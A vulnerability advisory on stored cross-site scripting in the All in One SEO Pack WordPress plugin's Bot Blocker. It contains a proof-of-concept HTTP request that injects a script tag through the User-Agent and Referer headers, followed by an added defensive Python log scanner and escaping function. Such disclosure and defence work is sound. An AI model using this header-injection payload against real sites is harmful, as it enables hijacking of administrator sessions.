WordPress All in One SEO Pack Plugin Persistent Cross-Site Scripting

2016.07.10
Credit: Pwnage
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------------------------------------
Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Bot Blocker
functionality of the All in One SEO Pack WordPress Plugin (1+ million
active installs). This issue allows an attacker to perform a wide variety
of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the All in One SEO Pack WordPress
Plugin version 2.3.6.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 2.3.7 of the plugin.

Free version
https://wordpress.org/plugins/all-in-one-seo-pack/

Pro version
https://semperplugins.com/all-in-one-seo-pack-pro-version/

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html

PoC:
------------------------------------------------------------------------
GET / HTTP/1.1
Host: 172.16.232.130
User-Agent: Abonti </pre><script>alert(1);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.232.130/</pre><script>alert(1);</script>
Connection: close
Cache-Control: max-age=0
------------------------------------------------------------------------
Admin will execute this code.
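The following is an added example, not code from the advisory or the plugin: a log-review helper that flags requests whose Referer or User-Agent header carries raw angle brackets, plus an output-escaping function for rendering such values in an admin page. The combined access-log format, the function names and the sample lines are assumptions made for illustration.

```python
import html
import re

# Assumed input: Apache/nginx "combined" access log lines, which end with
# "referer" "user-agent". Quotes inside values are backslash-escaped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Legitimate Referer and User-Agent values do not normally contain < or >.
MARKUP_RE = re.compile(r"[<>]")


def find_header_markup(lines):
    """Return (ip, field, value) for each logged header with raw angle brackets."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("referer", "agent"):
            value = m.group(field)
            if MARKUP_RE.search(value):
                hits.append((m.group("ip"), field, value))
    return hits


def render_log_row(agent, referer):
    """Escape request-supplied header values before embedding them in HTML."""
    return "<pre>{} {}</pre>".format(html.escape(agent), html.escape(referer))


# Constructed sample lines; header values in the second line are taken from the PoC.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2016:10:00:00 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [10/Jul/2016:10:00:05 +0000] "GET / HTTP/1.1" 200 512 '
    '"http://172.16.232.130/</pre><script>alert(1);</script>" '
    '"Abonti </pre><script>alert(1);</script>"',
]

if __name__ == "__main__":
    for ip, field, value in find_header_markup(SAMPLE_LOG):
        print(ip, field, value)
    print(render_log_row("Abonti </pre><script>alert(1);</script>", "-"))
```

Hits from the review helper indicate sites that received such requests while running a version before 2.3.7; the escaped rendering keeps the logged value inside the `<pre>` element as text.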

References:

https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html

